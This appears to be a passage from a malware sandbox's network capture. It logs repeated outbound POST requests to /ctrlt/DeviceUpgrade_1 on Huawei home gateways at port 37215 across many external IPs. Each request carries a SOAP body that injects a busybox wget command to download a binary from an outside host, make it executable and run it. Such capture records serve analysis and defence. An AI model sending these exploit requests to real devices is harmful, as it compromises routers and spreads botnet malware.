                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            966192.168.2.154982241.125.195.23137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746527910 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            967192.168.2.153917641.180.114.2237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746584892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            968192.168.2.154778641.32.3.23437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746586084 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            969192.168.2.155536041.162.84.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746607065 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            970192.168.2.154423241.165.32.19137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746627092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            971192.168.2.155890041.117.121.18137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746680975 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            972192.168.2.153708441.83.43.7837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746695995 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            973192.168.2.154776841.5.194.17637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746699095 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            974192.168.2.155213241.103.235.7037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746784925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            975192.168.2.154238441.116.108.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.746814013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 